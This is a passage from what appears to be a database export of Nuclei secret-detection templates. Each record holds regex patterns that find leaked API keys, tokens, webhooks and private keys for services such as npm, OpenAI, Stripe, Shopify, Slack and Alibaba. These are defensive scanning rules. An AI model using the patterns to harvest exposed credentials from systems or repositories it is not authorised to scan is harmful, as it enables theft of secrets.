https://github.com/github/roadmap/issues/557\n - https://github.blog/changelog/2022-12-06-limit-scope-of-npm-tokens-with-the-new-granular-access-tokens/\n metadata:\n verified: true\n tags: keys,file,npm,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \"\\b(npm_[A-Za-z0-9]{36})\\b\"\n# digest: 490a00463044022039866b0873f183f09afcd27823a4cc86515fb680c821d4ed80919cfa1ff69ac502202599aa40303d5467e19c13645105ca6c34c17796b73d6fabba5631c2476b3a73:922c64590222798bb761d5b6d8e72950", "hash": "d3f1b6907d23dd3b868d6f62755b90aa", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cf6" }, "name": "nuget-key.yaml", "content": "id: nuget-key\n\ninfo:\n name: NuGet API Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/nuget.yml\n - https://docs.microsoft.com/en-us/nuget/nuget-org/publish-a-package#create-api-keys\n metadata:\n verified: true\n tags: keys,file,nuget,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \"(oy2[a-z0-9]{43})\"\n# digest: 4a0a004730450221009ee6a3a09c234f4c41ee6c71b99a1461f714627ed8456ccd26fcd90b919ae3ec02203456759520c590ad30114fbac0a6723adb8c53dfd531b655d1af290117c24c04:922c64590222798bb761d5b6d8e72950", "hash": "3c7d90b541d00e91ee8abe666b5e85fb", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cf7" }, "name": "openai-key.yaml", "content": "id: openai-key\n\ninfo:\n name: OpenAI API Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/openai.yml\n - https://platform.openai.com/docs/api-reference\n - https://platform.openai.com/docs/api-reference/authentication\n metadata:\n verified: true\n tags: file,keys,openai,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\b(sk-[a-zA-Z0-9]{48})\\b\n# digest: 4a0a004730450220546f51da9aae790d391a6842237a517f47af7be274bdfa184f865fef630755fb022100fd67b83c7512040fa26564d51c5b03b08f6dc269a73b1fed32b696c5809bbc1c:922c64590222798bb761d5b6d8e72950", "hash": "0e44faa8fdff13ffa136ef8dc46f8b85", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cf8" }, "name": "paypal-braintree-token.yaml", "content": "id: paypal-braintree-token\n\ninfo:\n name: Paypal Braintree Access Token\n author: gaurang\n severity: high\n tags: file,keys,token,paypal\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"access_token\\\\$production\\\\$[0-9a-z]{16}\\\\$[0-9a-f]{32}\"\n# digest: 490a00463044022056d84dc6d601838e144b52aad17f5d96f5d7e968e394d85f12af03219b51d114022031accb17f2ac43db6480cb37ecd697e1c9b44aea60e02212aecf0eaa8163b0b8:922c64590222798bb761d5b6d8e72950", "hash": "b16d6a8881446884a0ab9a8bb7ed2239", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cf9" }, "name": "pictatic-api-key.yaml", "content": "id: pictatic-api-key\n\ninfo:\n name: Pictatic API Key\n author: gaurang\n severity: high\n tags: keys,file,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"sk_live_[0-9a-z]{32}\"\n# digest: 4a0a00473045022032fdd5dc224eeaffdef7c05502dfedc31e1bc930a446a4321c9b4e0943bff1c702210091f33fc218848d1e5987c600944cc9ba59195eb6891d01cd0052263c224464f8:922c64590222798bb761d5b6d8e72950", "hash": "445dae1966917bf09b92825f213c6f67", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cfa" }, "name": "postman-api-key.yaml", "content": "id: postman-api-key\n\ninfo:\n name: Postman API Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/postman.yml\n - https://learning.postman.com/docs/developer/intro-api/\n metadata:\n verified: true\n tags: postman,keys,file,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '\\b(PMAK-[a-zA-Z0-9]{24}-[a-zA-Z0-9]{34})\\b'\n\n# digest: 4b0a00483046022100e158e3c9539a86553368be020b6a63e4d2d7383d5ebabfc763746408d78466c3022100dd689e22c94823f880d079b79edb861cfc02f9dd2118c70b8fc23efe6047c933:922c64590222798bb761d5b6d8e72950\n", "hash": "d3cc97c5b96f8892b45258c73abd0ef5", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cfb" }, "name": "private-key.yaml", "content": "id: private-key\n\ninfo:\n name: Private Key Detect\n author: gaurang,geeknik\n severity: high\n tags: file,keys,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"BEGIN OPENSSH PRIVATE KEY\"\n - \"BEGIN PRIVATE KEY\"\n - \"BEGIN RSA PRIVATE KEY\"\n - \"BEGIN DSA PRIVATE KEY\"\n - \"BEGIN EC PRIVATE KEY\"\n - \"BEGIN PGP PRIVATE KEY BLOCK\"\n - \"ssh-rsa\"\n - \"ssh-dsa\"\n - \"ssh-ed25519\"\n# digest: 4a0a004730450220012882f3d65764d754d5f19daface386c18880d36acae666c3661a7b5fac3489022100fbcfdc07b0b9362befde988d181bf2f3af23847bcb67d65249c51c918db3a4db:922c64590222798bb761d5b6d8e72950", "hash": "679910025fbaf2fed64be48c84bf14f5", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cfc" }, "name": "pypi-token.yaml", "content": "id: pypi-token\n\ninfo:\n name: PyPI Upload Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/pypi.yml\n - https://github.com/pypa/warehouse/issues/6051\n - https://pypi.org/project/pypitoken/\n metadata:\n verified: true\n tags: file,keys,pypi,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \"(pypi-AgEIcHlwaS5vcmc[a-zA-Z0-9_-]{50,})\"\n# digest: 4b0a004830460221008fd309bb55fdcb10af63f0e5c49e66f96b5b63598001fd085e6ad1d7db4676480221009f8481869b196778dc1aa0a750367371173d1f41449f4dcb5cb906eaaa9f377b:922c64590222798bb761d5b6d8e72950", "hash": "6440e9319daf545b74b3e673ef77320f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cfd" }, "name": "razorpay-client-id.yaml", "content": "id: razorpay-client-id\n\ninfo:\n name: Razorpay Client ID\n author: Devang-Solanki\n severity: high\n reference:\n - https://github.com/streaak/keyhacks#Razorpay-keys\n - https://docs.gitguardian.com/secrets-detection/detectors/specifics/razorpay_apikey\n tags: file,keys,token,razorpay\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"rzp_(live|test)_.{14}\"\n# digest: 490a00463044022017958bca8d151dc9ccf82c6616ee782cd94dcfb9604195b37eab0e712de46b3a02205a23692aefd5d8b35b942ea874507b2b25b217c384ac028b05bf3882293cb32e:922c64590222798bb761d5b6d8e72950", "hash": "d33999daeb18bc1ee590634881e66cd1", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cfe" }, "name": "rubygems-key.yaml", "content": "id: rubygems-key\n\ninfo:\n name: RubyGems API Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/rubygems.yml\n - https://guides.rubygems.org/rubygems-org-api/\n - https://guides.rubygems.org/api-key-scopes/\n metadata:\n verified: true\n tags: file,keys,rubygems,token,ruby\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \"(rubygems_[a-f0-9]{48})\"\n# digest: 4a0a0047304502207bd78ce7b44dacf6aae4fbaa6afa5d82c7085d2cb323667240aff8b7d949cedb022100eeb152ea7c2cced5093efcfd79da8b9d80a89d1a8eb29b0ee3ed50ae61a49f15:922c64590222798bb761d5b6d8e72950", "hash": "4c73fb0f238f37975dd2e785ad394700", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cff" }, "name": "s3-bucket.yaml", "content": "id: s3-bucket\n\ninfo:\n name: S3 Bucket Detect\n author: gaurang\n severity: info\n tags: file,keys,token,bucket\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"[a-z0-9.-]+\\\\.s3\\\\.amazonaws\\\\.com\"\n - \"[a-z0-9.-]+\\\\.s3-[a-z0-9-]\\\\.amazonaws\\\\.com\"\n - \"[a-z0-9.-]+\\\\.s3-website[.-](eu|ap|us|ca|sa|cn)\"\n - \"//s3\\\\.amazonaws\\\\.com/[a-z0-9._-]+\"\n - \"//s3-[a-z0-9-]+\\\\.amazonaws\\\\.com/[a-z0-9._-]+\"\n# digest: 4a0a00473045022100c3ed21e6ff1fb637d42e18ec4636575c7df1069d9e355656d5f77ddb3a8fc8d7022027fc3fa8178e359af3509cc94dc1bf96cade6095d69409c4f521ef0175b091aa:922c64590222798bb761d5b6d8e72950", "hash": "2196111e0bc20b7b759b3de5c25b0712", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d00" }, "name": "sauce-access-token.yaml", "content": "id: sauce-access-token\n\ninfo:\n name: Sauce Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/sauce.yml\n metadata:\n verified: true\n tags: file,keys,sauce,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '(?i)sauce.{0,50}\\b([a-f0-9-]{36})\\b'\n# digest: 490a00463044022009ca563154c28786be32017d641fca7d37b8615cd7054e15823cff495a98bba3022066116c3e58abf5f5091e8f649632b0a9768878dee3a7ea572eedac7adcdefdd6:922c64590222798bb761d5b6d8e72950", "hash": "c4e039c91650fdb0d68b57a9e1bc03cc", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d01" }, "name": "segment-public-api.yaml", "content": "id: segment-public-api\n\ninfo:\n name: Segment Public API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/segment.yml\n - https://segment.com/docs/api/public-api/\n - https://segment.com/blog/how-segment-proactively-protects-customer-api-tokens/\n metadata:\n verified: true\n tags: keys,file,segment,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '(sgp_[a-zA-Z0-9]{64})'\n# digest: 4a0a0047304502202853fa0be0aad155b1bf710601dcb5443ebc8151a5852ae0e2c70357f8106f7c022100ab93a75342e2a408aa930452457c8bd908f297beb34396cf97af7ed89e76cf38:922c64590222798bb761d5b6d8e72950", "hash": "561caf6f78a25f01a83081a7c5e798dd", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d02" }, "name": "sendgrid-api.yaml", "content": "id: sendgrid-api-key-file\n\ninfo:\n name: Sendgrid API Key\n author: gaurang\n severity: high\n tags: keys,file,token,sendgrid\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"SG\\\\.[a-zA-Z0-9]{22}\\\\.[a-zA-Z0-9]{43}\"\n# digest: 4b0a00483046022100d3c8e8d194bf1de6ea48f9c0ed47cf49cc66a5f44195732b29617199ae5a360b022100d00c1fa924b6444959e020764b71559bc85f140c3c912d76e0fc6c35abe161d9:922c64590222798bb761d5b6d8e72950", "hash": "8b438f95b7b5b69b1d64cb82eff7467c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d03" }, "name": "shopify-custom-token.yaml", "content": "id: shopify-custom-token\n\ninfo:\n name: Shopify Custom App Access Token\n author: gaurang\n severity: high\n tags: file,keys,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"shpca_[a-fA-F0-9]{32}\"\n# digest: 4a0a00473045022034a27b39b96e56d6c5c5f0bb8437e6760ba81fa31281a386906e8eaea515bca9022100b8c26487144b3cc4e78cfd69fc39a62fe1eab148e86bcd6101a5beeb2ec3015e:922c64590222798bb761d5b6d8e72950", "hash": "3504329da4014f5855803bd8cf70ca0b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d04" }, "name": "shopify-private-token.yaml", "content": "id: shopify-private-token\n\ninfo:\n name: Shopify Private App Access Token\n author: gaurang\n severity: high\n tags: file,keys,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"shppa_[a-fA-F0-9]{32}\"\n# digest: 4b0a004830460221008a9fcfd1953cd27472015171cc2ff718e69112124812210ea6ba818da8c0de17022100a5dd54d3323017b989e594baf393a6915d32c96622b2be024cfad826b8a9d773:922c64590222798bb761d5b6d8e72950", "hash": "28d7a06aa087e21ab7f1a48946be5d12", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d05" }, "name": "shopify-public-access.yaml", "content": "id: shopify-public-access\n\ninfo:\n name: Shopify Access Token (Public App)\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/shopify.yml\n - https://shopify.dev/apps/auth\n - https://shopify.dev/changelog/app-secret-key-length-has-increased\n metadata:\n verified: true\n tags: file,keys,shopify,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '\\b(shpat_[a-fA-F0-9]{32})\\b'\n# digest: 4a0a00473045022056ae9c25283c7b064051f029d5dba8a224e83494727342a07f6ac9e97c7d96ad02210094d395337ca85abb5d825cab42781d3a2091f59355519823e9b7ec7994b8bd70:922c64590222798bb761d5b6d8e72950", "hash": "f6a9c054cab3eca2bf51fca3ac9ccb09", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d06" }, "name": "shopify-shared-secret.yaml", "content": "id: shopify-shared-secret\n\ninfo:\n name: Shopify Shared Secret\n author: gaurang\n severity: high\n tags: file,keys,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"shpss_[a-fA-F0-9]{32}\"\n# digest: 4a0a00473045022070a5f8b18d6bfa572f7903f81f2f46a542b0e08c7dd5a822be8d79ded225a81e022100f75c2fa4f6a9aa7217aab9cf51b808d6008d492b2f8230650519227e95d98050:922c64590222798bb761d5b6d8e72950", "hash": "e4581078f4ed7a5241c79a64713e737b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d07" }, "name": "shopify-token.yaml", "content": "id: shopify-access-token\n\ninfo:\n name: Shopify Access Token\n author: gaurang\n severity: high\n tags: file,keys,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"shpat_[a-fA-F0-9]{32}\"\n# digest: 4a0a0047304502200b41777dd82b3d396f4d76d75a526b7f5f863f8f1d2b4e313990480c398917ef022100810ddcd217e57655538d9153e898ad34e32c9b3179aceac031fbaf698de6ecc4:922c64590222798bb761d5b6d8e72950", "hash": "5778ad92859ff0dee06ed4739eb57c28", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d08" }, "name": "slack-api.yaml", "content": "id: slack-api\n\ninfo:\n name: Slack API Key\n author: gaurang\n severity: high\n tags: file,keys,token,slack\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"xox[baprs]-([0-9a-zA-Z]{10,48})?\"\n# digest: 4a0a004730450220098e1929b6ec4c0b3e189cebf5142b7ee75dfd23c8c9303e1a9b43f25e00c94b02210094541a8012719eec9a5b6fb643a3ef4050a67ef02165ba3eb94120d6458fb5c7:922c64590222798bb761d5b6d8e72950", "hash": "f4a3106e204e3afda508804b44ed88be", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d09" }, "name": "slack-webhook.yaml", "content": "id: slack-webhook\n\ninfo:\n name: Slack Webhook\n author: gaurang\n severity: high\n tags: file,keys,token,slack\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"https://hooks.slack.com/services/T[0-9A-Za-z\\\\-_]{8}/B[0-9A-Za-z\\\\-_]{8}/[0-9A-Za-z\\\\-_]{24}\"\n# digest: 490a00463044022030754b3461d730219fc7c4e9ce0b08cb582a6842e1161dd92551d5c86bde1a88022070d798d9356477fdda4e122fe64f5b6f981b7db9d85596b65e8e49b20f2dc657:922c64590222798bb761d5b6d8e72950", "hash": "270314cdc70124cf0ede13e4e0a38aee", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d0a" }, "name": "square-access-token.yaml", "content": "id: square-access-token\n\ninfo:\n name: Square Access Token\n author: gaurang,daffainfo\n severity: high\n tags: file,keys,token,square\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"EAAAE[a-zA-Z0-9_-]{59}\"\n - \"sq0atp-[0-9A-Za-z\\\\-_]{22}\"\n# digest: 490a00463044022016fc50e7940f4fb9d85db1563b7e86d644facdd66f530692b600d6cb0c4d3438022050fff84340f9f8afe3efbaeb9063ebc13bb5f4df8c13f328258d07ee43cc1998:922c64590222798bb761d5b6d8e72950", "hash": "00bd235d90cffb78264c8376272e9c47", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d0b" }, "name": "square-oauth-secret.yaml", "content": "id: square-oauth-secret\n\ninfo:\n name: Square OAuth Secret\n author: gaurang\n severity: high\n tags: file,keys,token,square\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"sq0csp-[0-9A-Za-z\\\\-_]{43}\"\n# digest: 4b0a00483046022100b9d713ce6825a6aa6f3a38bb156f20588d72be414cdb570f0946f7dda4c809c7022100ab886a6c8e1afb2b271507fc2fe390137235ad84e1de02247de49ee5a86e3cfa:922c64590222798bb761d5b6d8e72950", "hash": "72430375c5345fcbe13c26160976e567", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d0c" }, "name": "stackhawk-api-key.yaml", "content": "id: stackhawk-api-key\n\ninfo:\n name: StackHawk API Key\n author: hazana\n severity: medium\n reference:\n - https://docs.stackhawk.com/apidocs.html\n metadata:\n verified: true\n tags: file,keys,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"hawk\\\\.[0-9A-Za-z\\\\-_]{20}\\\\.[0-9A-Za-z\\\\-_]{20}\"\n# digest: 4a0a0047304502210097611c22dad431694acb1a7b7233bb23042461df6249cc72c417adf3d005f1250220257f95a6d89864ee22c1465cbd0bffb16a05aa4f28787ec0d65a7407d3258166:922c64590222798bb761d5b6d8e72950", "hash": "97f1fe976a009918bcd343d89acab03f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d0d" }, "name": "stripe-api-key.yaml", "content": "id: stripe-api-key\n\ninfo:\n name: Stripe API Key\n author: gaurang\n severity: high\n tags: file,keys,token,stripe\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"(?i)stripe(.{0,20})?[sr]k_live_[0-9a-zA-Z]{24}\"\n# digest: 4a0a00473045022100dcb13029ebf479d6aca563b1f1955ac0498c974f35af12006c2f9ebbb45c66770220286512d9e87b5923252c2c4fbb86ee621c42a66ec40ef13cd70937292e099cfa:922c64590222798bb761d5b6d8e72950", "hash": "d2be575c966e7cfe65a3877d93db3fe0", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d0e" }, "name": "telegram-token.yaml", "content": "id: telegram-token\n\ninfo:\n name: Telegram Bot Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/telegram.yml\n - https://core.telegram.org/bots/api\n - https://core.telegram.org/bots/features#botfather\n metadata:\n verified: true\n tags: file,keys,telegram,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '\\b(\\d+:AA[a-zA-Z0-9_-]{32,33})'\n# digest: 4a0a0047304502200d5ed3c8bfb5e36d8156b70f6307bdd05abdf92a55e6d486eac1ec3c88de967f022100fcd85801f37c8f52fa00d37262a861f0deec088f50d750da360932ff8ba21515:922c64590222798bb761d5b6d8e72950", "hash": "321abead679bd2e43e9511130556807c", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d0f" }, "name": "twilio-api.yaml", "content": "id: twilio-api\n\ninfo:\n name: Twilio API Key\n author: gaurang\n severity: high\n tags: file,keys,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"(?i)twilio(.{0,20})?SK[0-9a-f]{32}\"\n# digest: 4b0a004830460221009edd6055d2937d438ddc5a460cb57ceaf448ee273900a3a2ff9d217329cbaf170221009df1b8754959e50ef0155608d8ea98f45e87c59221868f7ad7a762ba88ba28fc:922c64590222798bb761d5b6d8e72950", "hash": "3b7e60ea862f78b7b6623bb06f5400eb", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d10" }, "name": "zapier-webhook.yaml", "content": "id: zapier-webhook\n\ninfo:\n name: Zapier Webhook\n author: Devang-Solanki\n severity: high\n reference:\n - https://github.com/streaak/keyhacks#Zapier-Webhook-Token\n - https://docs.gitguardian.com/secrets-detection/detectors/specifics/zapier_webhook_url\n tags: file,keys,token,zapier\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - 'https://(?:www.)?hooks\\.zapier\\.com/hooks/catch/[A-Za-z0-9]+/[A-Za-z0-9]+/'\n# digest: 4a0a004730450221009177769af7a8468ea644e7787fa6c35c65b057e8ad3b35b6d27e064a3763add30220734af477f469387822e7570ce196e8907ac3d4bb13b77be3d6b432944fce1e4a:922c64590222798bb761d5b6d8e72950", "hash": "9250f1e1c3d8159119bf6c20191830e6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d11" }, "name": "zendesk-secret-key.yaml", "content": "id: zendesk-secret-key\n\ninfo:\n name: Zendesk Secret Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/zendesk-secret-key.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/zendesk-secret-key.go\n metadata:\n verified: true\n tags: zendesk,file,keys\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:zendesk)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{40})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n\n# digest: 4a0a00473045022100ee6bae1cf90faa1beeae922204d58b2300e6ca7bf92065cb8a8402c597a1739002202c8bb2ae82d2e6c109dce0cce6fcb9d17f9f2977b098e1710dbdb8aafd92b8cd:922c64590222798bb761d5b6d8e72950\n", "hash": "0eceb3f1c41ec29f0ffae553067bb12e", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d12" }, "name": "adobe-client.yaml", "content": "id: adobe-client\n\ninfo:\n name: Adobe Client ID\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adobe-client-id.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adobe-client-id.go\n metadata:\n verified: true\n tags: keys,file,adobe,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:adobe)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-f0-9]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 490a00463044022007eda94aded10055c992548f92f163ce142cfa63312df87ab1913d55655c84a402205cfb63b7803c40be56e370f98a2541ef20c37455b0b0f136a5c19164ee802429:922c64590222798bb761d5b6d8e72950", "hash": "441adc145efd15d00b53db1bd740a2e7", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d13" }, "name": "adobe-secret.yaml", "content": "id: adobe-secret\n\ninfo:\n name: Adobe OAuth Client Secret\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/adobe.yml\n - https://developer.adobe.com/developer-console/docs/guides/authentication/\n - https://developer.adobe.com/developer-console/docs/guides/authentication/OAuthIntegration/\n - https://developer.adobe.com/developer-console/docs/guides/authentication/OAuth/\n metadata:\n verified: true\n tags: file,keys,adobe,oauth,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '(?i)\\b(p8e-[a-z0-9-]{32})(?:[^a-z0-9-]|$)'\n# digest: 4a0a00473045022100fbb2a00c904fe46b3138bc5a79cd5d3e108bf9a7ce64db4d82a47a40b4edfc7e022036f0b1d84e6bbde773bd90b9021e8202465c54346d9f1436af84e622a119114a:922c64590222798bb761d5b6d8e72950", "hash": "4ccca4ece4d491eb9938b8d212094560", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d14" }, "name": "age-identity-secret-key.yaml", "content": "id: age-identity-secret-key\n\ninfo:\n name: Age Identity (X22519 secret key)\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/age.yml\n - https://github.com/FiloSottile/age/blob/main/doc/age.1.html\n - https://github.com/C2SP/C2SP/blob/8b6a842e0360d35111c46be2a8019b2276295914/age.md#the-x25519-recipient-type\n metadata:\n verified: true\n tags: file,keys,age-encryption,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '\\bAGE-SECRET-KEY-1[0-9A-Z]{58}\\b'\n# digest: 4a0a00473045022100967a33608a1ecaa232719a64590ae179e82473d9ff9960e1294033f41dcfafb3022011659ec4586dff37d9381700897e858d37c2b363d718315d96fa9db721bc7123:922c64590222798bb761d5b6d8e72950", "hash": "bd1fa6eb5b589c4f3d0a53bcea8a4aa0", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d15" }, "name": "age-recipient-public-key.yaml", "content": "id: age-recipient-public-key\n\ninfo:\n name: Age Recipient (X25519 public key)\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/age.yml\n - https://github.com/FiloSottile/age/blob/main/doc/age.1.html\n - https://github.com/C2SP/C2SP/blob/8b6a842e0360d35111c46be2a8019b2276295914/age.md#the-x25519-recipient-type\n metadata:\n verified: true\n tags: file,keys,age-encryption,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '\\bage1[0-9a-z]{58}\\b'\n# digest: 4b0a004830460221008efb372243352ac7767832750aa04221c747bfb407e0d3599f6716055832807402210084c3968cf28f080a9a1ef95e6cd8a9029e85c7fa0d051df56217ecc16d6aafb9:922c64590222798bb761d5b6d8e72950", "hash": "15f4f31805540b183c4a124a03933ecb", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d16" }, "name": "alibaba-key-id.yaml", "content": "id: alibaba-key-id\n\ninfo:\n name: Alibaba Access Key ID\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-access-key-id.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-access-key-id.go\n metadata:\n verified: true\n tags: alibaba,access,file,keys\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)\\b((LTAI)(?i)[a-z0-9]{20})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 490a0046304402202a929c5a7c56fdcba6baf8a05f5ee26de1dc68039a330a33dba7e6973876605b0220499fe8d24c2d03e30f7ffa4077775380ea6b237262bfdc1319821135d3bf0faf:922c64590222798bb761d5b6d8e72950", "hash": "8cfc291d81e23fd52403b05e454ed8d9", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d17" }, "name": "alibaba-secret-id.yaml", "content": "id: alibaba-secret-id\n\ninfo:\n name: Alibaba Secret Key ID\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-secret-key.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-secret-key.go\n metadata:\n verified: true\n tags: alibaba,secret,file,keys\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:alibaba)(?:[0-9a-z\\-_\\t 